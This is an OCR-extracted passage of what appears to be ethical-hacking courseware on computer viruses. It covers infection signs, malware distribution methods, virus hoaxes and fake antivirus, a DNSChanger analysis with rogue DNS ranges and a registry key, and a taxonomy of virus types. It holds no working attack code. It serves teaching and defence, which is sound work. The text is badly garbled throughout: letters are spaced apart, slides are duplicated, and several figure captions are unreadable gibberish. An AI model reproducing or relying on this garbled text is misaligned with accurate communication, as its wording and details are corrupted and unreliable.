A n e f f e c t i v e v iru s t e n d s t o m u l t i p l y r a p id l y a n d m a y in f e c t a n u m b e r o f m a c h in e s w i t h i n t h r e e t o f iv e days. V iru s e s ca n in f e c t W o r d fi l e s w h i c h , w h e n t r a n s f e r r e d , can in f e c t t h e m a c h in e s o f t h e u sers w h o r e c e iv e t h e m . A v ir u s can also m a k e g o o d use o f f ile s e rv e rs in o r d e r t o i n f e c t file s . T h e f o l l o w i n g a re i n d i c a t i o n s o f a v i r u s a t t a c k o n a c o m p u t e r s y s te m : 0 0 0 0 0 P r o g r a m s ta k e lo n g e r t o loa d T h e h a r d d r iv e is a lw a y s fu ll, e v e n w i t h o u t in s t a llin g a n y p r o g r a m s T h e f l o p p y d is k d r iv e o r h a r d d r i v e r u n s w h e n it is n o t b e in g used U n k n o w n file s k e e p a p p e a r i n g o n t h e s y s te m T h e k e y b o a r d o r t h e c o m p u t e r e m i t s s tr a n g e o r b e e p in g s o u n d s T h e c o m p u t e r m o n i t o r d is p la y s s tr a n g e g r a p h ic s File n a m e s t u r n s tr a n g e , o f t e n b e y o n d r e c o g n i t i o n T h e h a r d d r iv e b e c o m e s in a c c e s s ib le w h e n t r y i n g t o b o o t f r o m t h e f l o p p y d r i v e A p r o g r a m 's size k e e p s c h a n g in g T h e m e m o r y o n t h e s y s te m s e e m s t o be in use a nd t h e s y s te m s lo w s d o w n
M o d u le 0 7 P ag e 1024
H o w
d o e s
a b y
o m
p u t e r
G e t
I n f e c t e d
V ir u s e s
W h e n a u s e r a c c e p ts f i l e s a n d d o w n l o a d s w i t h o u t c h e c k in g p r o p e r ly f o r t h e s o u rc e
in g in f e c t e d e - m a i l a t t a c h m e n t s
I n s t a llin g p i r a t e d s o f t w a r e
N o t u p d a t i n g a n d n o t i n s t a llin g n e w v e r s io n s o f p lu g - in s
: r u n n i n g t h e la t e s t a n t i - v i r u s a p p l i c a t i o n
H o w
'\ y;.-.v A y .
D o e s
a C o m p u te r G e t In fe c te d
b y
V ir u s e s ?
T h e r e a re m a n y w a y s in w h i c h a c o m p u t e r g e ts i n f e c t e d b y viru s e s . T h e m o s t p o p u l a r m e t h o d s a re as f o l lo w s : 0 0 W h e n a u s e r a c c e p ts file s a n d d o w n l o a d s w i t h o u t c h e c k in g p r o p e r l y f o r t h e s o u rc e . A t t a c k e r s u s u a lly se n d v i r u s - in f e c t e d file s as e m a il a t t a c h m e n t s t o s p re a d t h e v ir u s on t h e v i c t i m ' s s y s t e m . If t h e v i c t i m o p e n s t h e m a il, t h e v ir u s a u t o m a t i c a l l y i n f e c ts t h e s y s te m . 0 A t t a c k e r s i n c o r p o r a t e v iru s e s in p o p u l a r s o f t w a r e p r o g r a m s a n d u p lo a d t h e i n f e c t e d s o ftw a re on w e b s ite s in te n d e d to d o w n lo a d s o ftw a re . W h e n th e v ic tim i n f e c t e d s o f t w a r e a n d in s ta lls it, t h e s y s te m g e ts i n f e c t e d . 0 Failing t o in s ta ll n e w v e r s io n s o r u p d a t e w i t h la t e s t p a t c h e s i n t e n d e d t o fix t h e k n o w n b ug s m a y e x p o s e y o u r s y s te m t o viru s e s . 0 W i t h t h e in c r e a s in g t e c h n o l o g y , a tt a c k e r s also a re d e s ig n in g n e w v iru s e s . Failing t o use la t e s t a n t i v i r u s a p p li c a t i o n s m a y e x p o s e y o u t o v i r u s a t t a c k s d o w n lo a d s
M o d u le 0 7 P ag e 1025
C o m m o n T e c h n iq u e s D is tr ib u te M a lw a r e
U s e d
to
o n
th e W e b
CEH
B la c k h a t S e a rc h O p tim iz a tio n
E n g in e
(S E O )
M a lv e rtis in g
R anking m a lw a re pages h ig h ly in search re sults
E m be dding m a lw a re in a d -n e tw o rks th a t d ispla y across h u n d re d s o f le g itim a te , h ig h -tra ffic sites
S o c ia l E n g in e e re d C lic k -ja c k in g
C o m p ro m is e d W e b s ite s
L e g itim a te
T ric k in g users in to c lic k in g on in n o c e n t-lo o k in g w ebp age s
H o stin g e m b e d d e d m a lw a re th a t spreads to u n su sp e ctin g v is ito rs
S p e a rp h is h in g
S ite s
D riv e -b y D o w n l o a d s
M im ic k in g le g itim a te in s titu tio n s , such as banks, in an a tte m p t to steal a c c o u n t login cre d e n tia ls
E x p lo itin g fla w s in b ro w s e r s o ftw a re to in s ta ll m a lw a re ju s t by v is itin g a w e b page

Source: S ecurity T hreat R eport 2012 (h ttp ://w w w .so p h o s.co m )
jl.
C o m m o n ^ th e W e b
T e c h n iq u e s
U s e d
to
D is tr ib u te
M a lw a r e
o n
S o u rc e : S e c u r ity T h r e a t R e p o r t 2 0 1 2 ( h t t p : / / w w w . s o p h o s . c o m ) B l a c k h a t S e a rc h E n g in e O p t i m i z a t i o n (SEO): U sin g t h is t e c h n i q u e t h e a t t a c k e r r a n k s m a l w a r e p a g e s h ig h in se arch re s u lts S o cial E n g in e e r e d C lic k - ja c k in g : T h e a t t a c k e r s t r i c k t h e users i n t o c lic k in g o n i n n o c e n t - l o o k i n g w e b p ages t h a t c o n t a i n m a l w a r e S p e a r p h is h i n g S ite s: T his t e c h n i q u e is used f o r m im i c k i n g l e g i t i m a t e in s t it u t i o n s , such as ban ks, in an a t t e m p t t o ste al a c c o u n t lo g in c r e d e n t i a l s M a l v e r t i s i n g : E m b e d s m a l w a r e in ad n e t w o r k s t h a t d is p la y acro ss h u n d r e d s o f l e g i t i m a t e , h ig h t r a f f i c sites C o m p r o m i s e d L e g i t i m a t e W e b s it e s : H o s t e m b e d d e d m a l w a r e t h a t s p re a d s t o u n s u s p e c t i n g v is ito rs D r i v e - b y D o w n l o a d s : T h e a t t a c k e r e x p l o i t s f l a w s in b r o w s e r s o f t w a r e t o in s ta ll m a l w a r e j u s t by v is itin g a w e b p age
M o d u le 0 7 P ag e 1026
V i r u s
H o a x e s
a n d
F a k e
A n t i v i r u s e s
H o ax es a r e f a l s e a l a r m s c la im in g r e p o r t s a b o u t a n o n - e x i s t in g v ir u s w h ic h m a y c o n ta in v iru s a t t a c h m e n t s
A tta c k e r s d is g u is e m a lw a r e s a s a n a n t iv ir u s a n d tric k u s e r s to in sta ll th e m in th e ir s y ste m s O n c e in s ta lle d t h e s e fa k e a n tiv ir u s e s c a n d a m a g e t a r g e t s y s t e m s s im ila r t o o th e r m a lw a r e s
W a rn in g m e s s a g e s p r o p a g a tin g t h a t a c e rta in e m a il m e s s a g e s h o u ld n o t b e v ie w e d a n d d o in g s o will d a m a g e o n e 's s y s te m
tifai*ft-F0R W A I1r)T14l'W A N IN flA M 0N n'R lFN 0V tA M IIV A N nrO N TA rn ntAsc rm v/Aflo mu warningamong rnitN D S.rA M iivandcontactsHo* houMt* w * t d*'* tk*mat rwJw vvC oikxcptn y w ith4 1 1*tM chm vHvntltfv O> O S T C A R O'R O MU ir.O R tS IO N A T IO NO fB A R A C K O B A M A. ifgjrdlM iO fW hOS n t It to you Itft J V lfU S tfU t0p1A humiahi, imaoi, m n tornsthew hole run)c dsc you com puter. rih b 1 1 W W IN M M l4 1 > IU U IIL v OU y C M N U lU I1 IKHid) U 1llO tlTMjfMlllWA I' H U M
***
1 1
0 1
dtstr jctivtvirM^ver Theviiw ... .discovered bv McAfee vtdiv. nd thpp 1 4nor tear jc for :h i
1 >
t S e Z e t o S e t t o f a l U i e l l o d D i M . ,m I i v i c t l . rv i u l x i f o i m a t b o n k v L
w -
j y
| r J
! ! L
i f s r s r *
==
V ir u s
H o a x e s
a n d
F a k e
A n tiv ir u s e s
V iru s H o a x e s A v ir u s h o a x is s i m p l y a b lu ff. V iru s e s , by t h e i r n a t u r e , h a v e a lw a y s c r e a te d a h o r r i f y i n g i m p r e s s io n . H oa x es a re t y p i c a l l y u n t r u e sca re a le r t s t h a t u n s c r u p u l o u s in d iv id u a ls s e n d t o c r e a te h a v o c . It is f a i r l y c o m m o n f o r i n n o c e n t users t o pass th e s e p h o n y m essa ge s a lo n g t h i n k i n g t h e y a re h e lp in g o t h e r s a v o id t h e " v i r u s . " 0 0 H oa xes a re fa lse a la r m s c la im in g r e p o r t s a b o u t n o n - e x i s t i n g v iru s e s T he se w a r n i n g m essages, w h i c h can b e p r o p a g a t e d r a p id ly , s t a t in g t h a t ac e r ta in m e s s a g e s h o u ld n o t be o p e n e d , a n d t h a t d o i n g so w o u l d d a m a g e o n e 's s y s te m 0 0 In s o m e cases, th e s e w a r n i n g m essa ge s t h e m s e l v e s c o n t a i n v iru s a t t a c h m e n t s T he se possess t h e c a p a b i l it y o f v a s t d e s t r u c t i o n o n t a r g e t s y s te m s e m a il
M a n y h o a x e s t r y t o " s e l l" t h in g s t h a t a re t e c h n i c a l l y n o n s e n s e . N e v e rth e le s s , t h e h o a x e r has t o be s o m e w h a t o f an e x p e r t t o s p re a d h o a x e s in o r d e r t o a v o id b e in g i d e n t if ie d a n d c a u g h t. T h e r e f o r e , it is a g o o d p r a c tic e t o lo o k f o r t e c h n i c a l d e t a i ls a b o u t h o w t o b e c o m e i n f e c t e d . A lso se arch f o r i n f o r m a t i o n in t h e w i ld t o le a rn m o r e a b o u t t h e h o a x , e s p e c ia lly by s c a n n in g b u l l e t i n b o a r d s w h e r e p e o p le a c tiv e ly discuss c u r r e n t h a p p e n in g s in t h e c o m m u n i t y .
M o d u le 0 7 P ag e 1027
T ry t o c ro s s c h e c k t h e i d e n t i t y o f t h e p e r s o n w h o has p o s te d t h e w a r n i n g . A lso l o o k f o r m o r e i n f o r m a t i o n a b o u t t h e h o a x / w a r n i n g f r o m s e c o n d a r y s o u rc e s . B e fo re j u m p i n g t o c o n c lu s io n s by r e a d in g c e r t a i n d o c u m e n t s o n t h e I n t e r n e t , c h e c k t h e f o l l o w i n g : Q If it is p o s te d a n o th e r source If t h e p e r s o n w h o has p o s te d t h e n e w s is n o t a k n o w n p e r s o n in t h e c o m m u n i t y o r an e x p e r t , c ro s s c h e c k t h e i n f o r m a t i o n w i t h a n o t h e r s o u r c e 0 If a g o v e r n m e n t b o d y has p o s te d t h e n e w s , t h e p o s tin g s h o u ld also h a v e a r e f e r e n c e t o th e c o rre s p o n d in g fe d e ra l r e g u la tio n Q O n e o f t h e m o s t e f f e c t i v e c h e c k s is t o lo o k u p t h e s u s p e c te d h o a x v i r u s b y n a m e o n a n t i v i r u s s o f t w a r e v e n d o r sites Q If t h e p o s tin g is te c h n ic a l, h u n t f o r sites t h a t w o u l d c a t e r t o t h e t e c h n i c a l i t i e s , a n d t r y t o a u th e n tic a te th e in fo rm a tio n
S u b je c t: FO R W AR D THIS W A R N IN G A M O N G FRIENDS, FA M ILY AN D CONTACTS PLEASE FORW ARD THIS W A R N IN G A M O N G FRIENDS, FAM ILY A N D CONTACTSI You s h o u ld be a le rt d u rin g th e n e xt fe w days. D o n o t o p e n a n y m essage w ith a n a tta c h m e n t e n title d 'POSTCARD FR O M BEJING o r 'R ESIG N ATIO N OF 8A R A C K O B A M A , regardless o f w h o se n t it t o y o u . It is a v iru s th a t o p e n s A POSTCARD IM AG E, th e n 'b u rn s ' th e w h o le h a rd C disc o f y o u r c o m p u te r. This is th e w o r s t v ir u s a n n o u n c e d by CN N last e ve n in g . It has been classified by M ic r o s o ft as th e m o s t d e s tr u c tiv e v ir u s ev e r. The v iru s w a 5 d is c o v e re d b y M c A fe e y e s te rd a y , a n d th e re is n o re p a ir y e t fo r th is k in d o f v iru s. This v iru s s im p ly d e s tro y s th e Z e ro S ector o f th e H ard Disc, w h e re th e v ita l in fo rm a tio n is ke p t. COPY THIS E M A IL, AN D SEND IT TO YOUR FRIENDS.REMEMBER: IF YOU SEND IT TO THEM , YOU W ILL BENEFIT ALL OF US. E n d -o f-m a il Thanks.
by n e w s g r o u p s t h a t a re s u s p ic io u s , c r o s s c h e c k t h e i n f o r m a t i o n w i t h
FIGURE 7 .3 : H oaxe s W a rn in g M e ssage
F a k e A n tiv iru s e s Fake a n tiv ir u s e s is a m e t h o d o f a f f e c t i n g a s y s te m b y h a c k e rs a n d it can p o is o n y o u r s y s te m a n d o u t b r e a k t h e r e g is t r y a n d s y s te m file s t o a l l o w t h e a t t a c k e r t o t a k e f u ll c o n t r o l a n d access t o y o u r c o m p u t e r . It a p p e a rs a n d p e r f o r m s s i m i l a r l y t o a real a n t i v i r u s p r o g r a m . Fake a n t i v i r u s p r o g r a m s f i r s t a p p e a r o n d i f f e r e n t b r o w s e r s a n d w a r n users t h a t t h e y h ave d i f f e r e n t s e c u r i t y t h r e a t s o n t h e i r s y s te m , a n d t h is m e s s a g e is b a c k e d u p b y r e a l s u s p ic io u s v iru s e s . W h e n t h e u s e r tr ie s t o r e m o v e t h e v ir u s e s , t h e n t h e y a re n a v ig a te d t o a n o t h e r p age w h e r e t h e y n e e d t o b u y o r s u b s c r ib e t o t h a t a n t i v i r u s a n d p r o c e e d t o p a y m e n t d e ta ils . T he se f a k e a n t i v i r u s p r o g r a m s a re b e e n f a b r i c a t e d in s u ch a w a y t h a t t h e y d r a w t h e a t t e n t i o n o f t h e u n s u s p e c t i n g u s e r i n t o in s t a llin g t h e s o f t w a r e . S o m e o f t h e m e t h o d s used t o e x t e n d t h e usage a n d in s t a l l a t i o n o f fa k e a n t i v i r u s p r o g r a m s in c lu d e : E m a il a n d m e s s a g in g : A t t a c k e r s use s p a m e m a il a n d social n e t w o r k i n g m e ss a g e s t o s p re a d t h is t y p e o f i n f e c t e d e m a il t o users a n d p r o b e t h e u s e r t o o p e n t h e a t t a c h m e n t s f o r s o f t w a r e i n s t a lla t io n .
M o d u le 0 7 P ag e 1028
S e a rch e n g in e o p t i m i z a t i o n : A t t a c k e r s g e n e r a t e p ages r e la t e d t o
p u b lic o r c u r r e n t
s e a rch t e r m s a n d p la n t t h e m t o a p p e a r as e x t r a o r d i n a r y a n d t h e la t e s t in s e a rch e n g in e r e s u lts . T h e w e b p ages s h o w a le rts a b o u t i n f e c t i o n t h a t e n c o u r a g e t h e u s e r t o b u y t h e fa k e a n tiv ir u s . Q C o m p r o m i s e d w e b s i t e s : A t t a c k e r s s e c r e t l y b r e a k i n t o p o p u l a r sites t o in s ta ll t h e fa k e a n tiv ir u s e s , w h i c h can be used t o e n tic e users t o d o w n l o a d t h e f a k e a n t i v i r u s b y r e ly in g o n t h e s ite 's p o p u l a r i t y .
J
a
Protection
-wacy
I
P a th I n lr c t io m C \w C C ^ S \J N t5 ^ c ^ e e U J r^ 4 ifV * g 0 a 5 7 2 35
SMtacat
FIGURE 7 .4 : E xa m p le o f a Fake A n tiv iru s
M o d u le 0 7 P ag e 1029
i r u s
n a l y s i s :
h a n g e r
CEH
D N S C h a n g e r (A lu re o n ) m o d i f ie s t h e DNS s e t t i n g s o n t h e v ic tim PC t o d iv e r t I n t e r n e t tra ffic t o m a lic io u s w e b s ite s in o rd e r to g e n e ra te fra u d u le n t a d re v e n u e , sell fa k e s e r v ic e s , o r s t e a l p e r s o n a l f in a n c ia l i n f o r m a ti o n
It a c ts a s a b o t a n d c a n b e o r g a n iz e d in to a B o tN e t a n d c o n tr o lle d f r o m a r e m o te lo c a tio n
<W >
It s p r e a d s t h r o u g h e m a il s , s o c ia l e n g i n e e r i n g tr i c k s , a n d u n tr u s te d d o w n lo a d s f r o m t h e I n t e r n e t
D N S C h a n g e r m a lw a r e a c h ie v e s t h e DNS r e d ir e c tio n b y m o d ify in g t h e fo llo w in g r e g i s t r y k e y s e tt in g s a g a in s t a in te r f a c e d e v ic e s u c h a s n e t w o r k c a rd
$
<K>
D N S C h a n g e r
D N S C h an g e r h a s r e c e iv e d s ig n ific a n t a t te n t io n d u e to t h e la rg e n u m b e r o f a f f e c te d s y s t e m s w o r ld w id e a n d t h e f a c t t h a t a s p a r t o f t h e B o tN e t t a k e d o w n t h e FBI to o k o w n e r s h ip o f t h e r o g u e DNS s e r v e r s to e n s u r e t h o s e a f f e c te d d id n o t im m e d ia te ly lo s e t h e a b ility t o r e s o lv e D NS n a m e s
UHU
H K E Y _ L O C A L _ M A C H IN E \S Y S T E M \C u r r e n tC o n tr o l S e t\S e r v ic e s \T c p ip \P a r a m e te r s \ln te r fa c e s \% R a n d o m C L SID % N a m e S e r v e r
h t t p : / /w w w . to ta ld e fe n s e . c o m
V ir u s
A n a ly s is :
S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m D N S C h a n g e r ( A l u r e o n ) is m a l w a r e t h a t s p re a d s t h r o u g h e m a ils , s o c ia l e n g i n e e r i n g tr i c k s , a nd u n t r u s t e d d o w n l o a d s f r o m t h e I n t e r n e t . It a cts as a b o t a n d can be o rg a n iz e d i n t o a b o t n e t a nd c o n t r o l l e d f r o m a r e m o t e l o c a tio n . T his m a l w a r e a c h ie v e s DNS r e d i r e c t i o n b y m o d i f y i n g t h e s y s te m r e g is t r y k e y s e ttin g s a g a in s t an i n t e r f a c e d e v ic e such as n e t w o r k c a rd . D N S C h a n g e r has r e c e iv e d s i g n ific a n t a t t e n t i o n d u e t o t h e large n u m b e r o f a f f e c t e d s y s te m s w o r l d w i d e a n d t h e f a c t t h a t as p a r t o f t h e b o t n e t t a k e d o w n , t h e FBI t o o k o w n e r s h i p o f r o g u e DNS s e r v e r s t o e n s u r e t h o s e a f f e c t e d d id n o t i m m e d i a t e l y lose t h e a b i l it y t o re s o lv e DNS n a m e s . T his can e v e n m o d i f y t h e DNS s e ttin g s o n t h e v i c t i m ' s PC t o d i v e r t I n t e r n e t t r a f f i c t o m a lic io u s w e b s i t e s in o r d e r t o g e n e r a t e f r a u d u l e n t a d r e v e n u e , sell f a k e s e rv ic e s , o r ste al p e r s o n a l f in a n c ia l i n f o r m a t i o n .
M o d u le 0 7 P ag e 1030
i r u s
n a l y s i s :
h a n g e r
(C o n td)
The ro g u e DNS servers can e xist in an y o f th e fo llo w in g ranges:
D N S C h an g er
64.28.176.0 - 64.28.191.255, 6 7 .210.0.0 - 67.210.15.255 7 7 .6 7 .8 3 .0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255 85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
DNSChanger sniffs the credential and redirects the request to real website Real Website
ww.xrecyritY-tP1
IP: 200.0.0.45
DNSChanger infects victim's computer by change her DNS IP address to: 64.28.176.2
Attacker runs DNS Server in Russia (IP: 64.28.176.2)
h ttp://www. tota !defense, com
to u t
V ir u s
A n a ly s is :
D N S C h a n g e r ( C o n td )
S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m
T h e r o g u e DNS s e rv e rs can e x is t in a n y o f t h e f o l l o w i n g ran ge s: 6 4 .2 8 .1 7 6 .0 - 6 4 .2 8 .1 9 1 .2 5 5 , 6 7.2 1 0 .0 .0 6 7.2 1 0 .1 5 .2 5 5 7 7.6 7 .8 3 .0 - 7 7 .6 7 .8 3 .2 5 5 , 9 3 .1 8 8 .1 6 0 .0 - 9 3 .1 8 8 .1 6 7 .2 5 5 8 5 .2 5 5 .1 1 2 .0 - 8 5 .2 5 5 .1 2 7 .2 5 5 , 2 1 3 .1 0 9 .6 4 .0 - 2 1 3 .1 0 9 .7 9 .2 5 5
M o d u le 0 7 P ag e 1031
Whal is the IP address of www. *security. corn
>
F a k e W e b s it e
D N S C h a n g e r s n if f s t h e c r e d e n t ia l a n d r e d ir e c t s t h e r e q u e s t t o r e a l w e b s it e
Real Website
w v A v . x s e c u r it v . c o m IP : 2 0 0 . 0 . 0 . 4 5
IP: 65.0.0.2
DNS R equest d o
to 64.28.176.2
>
D N S C h a n g e r i n f e c t s v ic t im 's c o m p u t e r b y c h a n g e h e r D N S IP a d d re s s to : 6 4 .2 8 .1 7 6 .2
A t t a c k e r r u n s D N S S e r v e r in
Russia (IP: 64.28.176.2)

FIGURE 7 .5 : V iru s A n a lysis U sing D N S C hanger
T o in f e c t t h e s y s te m a nd s te a l c r e d e n tia ls , t h e a t t a c k e r has t o f i r s t ru n DNS s e rv e r. H e re t h e a t t a c k e r r u n s his o r h e r D N S s e r v e r in Russia w i t h an IP o f, say, 6 4 .2 8 . 1 7 6 . 2 . N e x t, t h e a t t a c k e r i n f e c ts t h e v i c t i m ' s c o m p u t e r by c h a n g in g his o r h e r DNS IP a d d re s s t o : 6 4 .2 8 .1 7 6 .2 . W h e n th is m a l w a r e has i n f e c t e d t h e s y s te m , it e n t i r e l y c h a n g e s t h e DNS s e ttin g s o f t h e i n f e c t e d m a c h in e a n d fo r c e s all t h e DNS r e q u e s t t o g o t o t h e D N S s e rv e r ru n b y t h e a tta c k e r . A f t e r a lt e r in g th e s e t t i n g o f t h e DNS, a n y r e q u e s t t h a t is m a d e b y t h e s y s te m is s e n t t o t h e m a l i c io u s DNS s e r v e r . H e re , t h e v ic tim sent DNS Request w h a t is t h e IP a d d re s s o f w w w .x s e c u rity .c o m " to
( 6 4 .2 8 .1 7 6 .2 ). T h e a t t a c k e r g a v e a re s p o n s e t o t h e r e q u e s t as w w w . x s e c u r i t v . c o m . w h i c h is l o c a te d a t 6 5 .0 .0 .2 . W h e n v i c t i m ' s b r o w s e r c o n n e c t s t o 6 5 .0 .0 .2 , it r e d ir e c ts h im o r h e r t o a fa k e w e b s i t e c r e a te d b y t h e a t t a c k e r w i t h IP: 6 5 .0 .0 .2 . D N S C h a n g e r s n iffs t h e c r e d e n t i a l (u s e r n a m e , p a s s w o r d s ) a n d r e d ir e c ts t h e r e q u e s t t o real w e b s i t e (w w w . x s e c u r i t y . c o m ) w i t h IP: 2 0 0 .0 .0 .4 5 .
M o d u le 0 7 P ag e 1032
M o d u le Flo w
CEH
V iru s
a n d
W o rm s C o n c e p ts
C o u n te r m e a s u re s
M a lw a re A n a ly s is
Copyright by E & C aincil. All Rights Reserved. Reproduction is Strictly Prohibited.
|| M o d u le
F lo w
P r io r t o th is , w e h a v e d is cu sse d a b o u t v iru s e s a n d w o r m s . N o w w e w i ll discuss a b o u t d i f f e r e n t ty p e s o f viru s e s .
V iru s a n d W o r m s C o n c e p t
M a l w a r e A n a ly s is
T y p e s o f V ir u s e s
C o u n te rm e a su re s
y v
P e n e t r a t i o n T e s t in g
This s e c tio n d e s c r ib e s a b o u t d i f f e r e n t ty p e s o f V iru se s.
M o d u le 0 7 P ag e 1033
S y ste m o r B o o t S e c to r V ir u s e s
S t e a l t h V ir u s / T u n n e lin g V iru s E n c r y p tio n P o ly m o r p h ic
M e ta m o r p h ic
C lu s te r V iru s e s
S p arse In fe c to r V iru s
M u ltip a rtite
D ir e c t A c tio n o r T ra n sie n t
T y p e s
o f V ir u s e s c o n c e p ts . N o w w e w ill discuss
So fa r, w e h a v e d iscu ss e d v a r io u s v ir u s a n d w o r m v a r io u s t y p e s o f viru s e s .
T his s e c tio n h ig h lig h ts v a r io u s ty p e s o f v iru s e s a n d w o r m s such as file a n d m u l t i p a r t i t e v ir u s e s , m a c r o v iru s e s , c lu s t e r viru s e s , s t e a l t h / t u n n e l i n g v iru s e s , e n c r y p t i o n v iru s e s , m e t a m o r p h i c v iru s e s , shell viru s e s , a n d so o n . C o m p u t e r v iru s e s a re t h e m a l i c io u s s o f t w a r e p r o g r a m s w r i t t e n by a t ta c k e r s t o i n t e n t i o n a l l y e n t e r t h e t a r g e t e d s y s te m w i t h o u t t h e u s e r 's p e r m i s s i o n . As a re s u lt, t h e y a f f e c t t h e s e c u r it y s y s te m a n d p e r f o r m a n c e o f t h e m a c h in e . A f e w o f t h e m o s t c o m m o n ty p e s o f c o m p u t e r v iru s e s t h a t a d v e r s e l y a f f e c t s e c u r it y s y s te m s a re d iscu s se d in d e ta il o n t h e f o l l o w i n g slides.
T y p e s
o f V ir u s e s
V iru s e s a re cla s s ifie d d e p e n d i n g o n t w o c a te g o r ie s : Q W h a t Do T h e y In fe c t? H o w Do T h e y In fe c t?
M o d u le 0 7 P ag e 1034
W h a t D o T h e y In fe c t? S y s te m o r B o o t S e c to r V ir u s e s f*. _ T h e m o s t c o m m o n t a r g e t s f o r a v iru s a re t h e s y s te m s e c to rs , w h i c h a re n o t h i n g b u t
t h e M a s t e r B o o t R e c o rd a n d t h e DOS B o o t R e c o rd S y s t e m s e c to r s . T h e s e a re t h e a re a s o n th e d isk t h a t are e x e c u t e d w h e n t h e PC is b o o t e d . E ve ry d isk has a s y s te m s e c to r o f s o m e s o rt. T h e y s p e c ia lly in f e c t t h e f l o p p y b o o t s e c to r s a n d r e c o r d s o f t h e h a rd disk. For e x a m p le : Disk K iller a n d S to n e v iru s . F ile V iru s e s E x e c u ta b le file s a re i n f e c t e d b y file v iru s e s , as t h e y i n s e r t t h e i r c o d e i n t o t h e o r ig in a l file a n d g e t e x e c u te d . File v iru s e s a re la r g e r in n u m b e r , b u t t h e y a re n o t t h e m o s t c o m m o n l y f o u n d . T h e y i n f e c t in a v a r i e t y o f w a y s a n d can be f o u n d in a la rg e n u m b e r o f file ty p e s . M u ltip a r tite V iru s T h e y i n f e c t p r o g r a m file s, a n d t h is f ile in t u r n a ffe c ts t h e b o o t s e c to r s su ch as In v a d e r , Flip, a n d T e q u ila . C lu s te r V iru s e s C lu s te r v iru s e s i n f e c t file s w i t h o u t c h a n g in g t h e f ile o r p la n t in g e x tr a file s ; t h e y c h a n g e t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l p ro g ra m . M a c r o V iru s M i c r o s o f t W o r d o r a s i m i l a r a p p li c a t i o n can be i n f e c t e d t h r o u g h a c o m p u t e r v iru s c a lle d a m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M a c r o v iru s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. H o w D o T h e y In fe c t? S te a lth V ir u s e s T h e se v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s b y a c t i v e l y a l t e r i n g a n d
c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s te a lth v ir u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hus, it ta k e s o v e r p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v i r u s c o d e .
L i f e :
T u n n e lin g V iru s e s T h e s e v ir u s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s te m
r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . T o p e r f o r m t h is a c tiv it y , t h e y even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s.
M o d u le
07
P ag e 1035
\ c_
E n c r y p tio n V iru s e s T his t y p e o f v ir u s c o n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a n d a d e c r y p t i o n m o d u l e .
T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n .
iri) P o l y m o r p h i c V i r u s e s
, T h e s e v iru s e s w e r e d e v e lo p e d t o c o n f u s e a n t i v i r u s p r o g r a m s t h a t scan f o r v iru s e s in t h e s y s te m . It is d i f f i c u l t t o t r a c e t h e m , since t h e y c h a n g e t h e i r c h a r a c te r is t ic s e a ch t i m e t h e y in f e c t, e.g., e v e r y c o p y o f t h is v ir u s d if f e r s f r o m its p r e v io u s o n e . V i r u s d e v e l o p e r s h a v e e v e n c r e a t e d m e t a m o r p h i c e n g in e s a n d v ir u s w r i t i n g t o o l k its t h a t m a k e t h e c o d e o f an e x is t in g v ir u s lo o k d i f f e r e n t f r o m o t h e r s o f its k in d . M e ta m o r p h ic V iru s e s A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . T his t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t, is u sed t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . T his is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v iru s c o n s is ts o f c o m p le x e x te n s iv e c o d e . O v e r w r it in g F ile o r C a v ity V iru s e s S o m e p r o g r a m file s h a v e a re as o f e m p t y space. T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e viru s e s . T h e C a v i t y V ir u s , also k n o w n as t h e S pace F ille r V ir u s , s to r e s its c o d e in th is e m p t y space. T h e v ir u s in s ta lls it s e lf in th is u n o c c u p ie d sp ace w i t h o u t a n y d e s t r u c t io n t o t h e o rig in a l c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in f e c t. S p a rs e In fe c to r V iru s e s
A sp arse i n f e c t o r v iru s i n f e c ts o n l y o c c a s i o n a l l y (e.g., e v e r y t e n t h p r o g r a m e x e c u te d )
